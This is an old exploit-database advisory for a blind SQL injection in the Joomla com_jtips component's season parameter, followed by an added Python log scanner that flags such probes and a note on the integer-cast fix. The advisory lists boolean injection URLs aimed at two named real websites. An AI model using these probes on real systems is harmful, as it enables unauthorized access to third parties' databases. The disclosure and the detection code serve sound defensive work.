Joomla Component com_jtips 1.0.x season bSQL Injection Vuln by h3m4n


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jtips (season) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        : Chip D3 Bi0s
[+] Group         : LatinHackteam
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios[alt+64]gmail.com

###################################################

Example:
http://localhost/path/index.php?option=com_jtips&Itemid=1&task=ladder&season=2[SQL code]


DEMO (1):
http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=1
True !!!!

http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=2
False !!!


DEMO (2):
http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=1
True !!!

http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=!
False !!!


etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

tested: 1.0.7 / 1.0.9

# milw0rm.com [2009-08-24]
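
Added example, not part of the original advisory: a log check that flags requests to com_jtips whose season parameter is not a plain integer, and groups the flagged requests per client so that differing response sizes (the true/false pattern shown in the demos) stand out. It assumes combined-format access logs and that legitimate season values are short decimal ids; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Aug/2009:10:00:01 +0000] "GET /index.php?option=com_jtips&Itemid=1&task=ladder&season=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [24/Aug/2009:10:00:07 +0000] "GET /index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [24/Aug/2009:10:00:09 +0000] "GET /index.php?option=com_jtips&Itemid=1&task=ladder&season=2%20and%201%3D2 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Aug/2009:10:00:15 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)'
)

def season_is_clean(value):
    """Assumption: a legitimate season id is a short run of decimal digits."""
    return re.fullmatch(r"\d{1,6}", value) is not None

def find_suspect_requests(log_text):
    """Return com_jtips requests whose decoded season value is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        # parse_qs decodes both '+' and %XX, so encoded variants are compared alike
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jtips" not in query.get("option", []):
            continue
        for value in query.get("season", []):
            if not season_is_clean(value):
                hits.append({"client": client, "season": value,
                             "status": int(status), "bytes": size})
    return hits

def response_sizes_by_client(hits):
    """Group flagged requests per client; differing sizes match a true/false probe pair."""
    sizes = defaultdict(set)
    for hit in hits:
        sizes[hit["client"]].add(hit["bytes"])
    return dict(sizes)

if __name__ == "__main__":
    flagged = find_suspect_requests(SAMPLE_LOG)
    for hit in flagged:
        print(hit)
    print(response_sizes_by_client(flagged))
```

The same digits-only rule applied server-side, by casting season to an integer before it reaches the query, is the corresponding fix.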




Chip D3 Bi0s                                                                                              08/24/2009

								